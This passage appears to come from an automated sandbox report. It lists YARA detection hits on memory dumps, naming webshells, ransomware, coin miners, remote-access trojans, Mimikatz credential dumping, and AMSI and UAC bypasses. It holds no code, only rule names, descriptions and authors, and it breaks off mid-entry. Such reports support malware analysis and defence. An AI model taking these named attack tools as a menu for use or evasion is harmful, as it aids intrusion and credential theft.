webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: clearlog, Description: Detects Fireball malware - file clearlog.dll, Source: 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_unspecified_Jan18_1, Description: Detects unspecified malware sample, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Vidar, Description: Yara detected Vidar stealer, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ByteLocker, Description: Yara detected ByteLocker Ransomware, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Artemon, Description: Yara detected Artemon Ransomware, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_lazparking, Description: Yara detected LazParking Ransomware, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6349322522.0000028BD67F0000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6316150838.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6316150838.0000028BD6D56000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6306591281.0000028BD7440000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6340321135.0000028BD67F0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp, Author: Joe Security Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6344420092.0000028BD7070000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6344420092.0000028BD7070000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6332134086.0000028BD7440000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6299891132.0000028BD7070000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6299891132.0000028BD7070000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6266904104.0000028BD642E000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Florian Roth Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_Cobra_Locker, Description: Yara detected Cobra Locker ransomware, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6336368207.0000028BD7C4C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6332319497.0000028BD7A3C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6332319497.0000028BD7A3C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, Author: Joe Security Rule: HackTool_Samples, Description: Hacktool, Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, Author: unknown Rule: PS_AMSI_Bypass, Description: Detects PowerShell AMSI Bypass, Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, Author: Joe Security Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000023.00000003.6329904387.0000028BD62AA000.00000004.00000001.sdmp, Author: Joe Security Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6272308582.0000028BD6A80000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_jsp_by_string, Description: JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6311853685.0000028BD7A3C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6311853685.0000028BD7A3C000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, Author: Joe Security Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000023.00000003.6337514171.0000028BD6735000.00000004.00000001.sdmp, Author: Cylance Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, Author: Joe Security Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ammyy_Admin_AA_v3, Description: Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, Source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp, Author: Joe Security Rule: GoldDragon_Aux_File, Description: Detects export from Gold Dragon - February 2018, Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_base64_encoded_payloads, Description: php webshell containing base64 encoded payload, Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_hidden_tear, Description: Yara detected HiddenTear ransomware, Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6338346630.0000028BD733C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6338346630.0000028BD733C000.00000004.00000001.sdmp, Author: Joe Security Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Growtopia, Description: Yara detected Growtopia, Source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nemty, Description: Yara detected Nemty Ransomware, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6323124773.0000028BD67F0000.00000004.00000001.sdmp, Author: Joe Security Rule: HackTool_MSIL_SharPersist_2, Description: unknown, Source: 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp, Author: FireEye Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6296311842.0000028BD60E4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6296311842.0000028BD60E4000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Florian Roth Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_Cobra_Locker, Description: Yara detected Cobra Locker ransomware, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6318490215.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000023.00000003.6318490215.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6344793289.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000023.00000003.6344793289.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 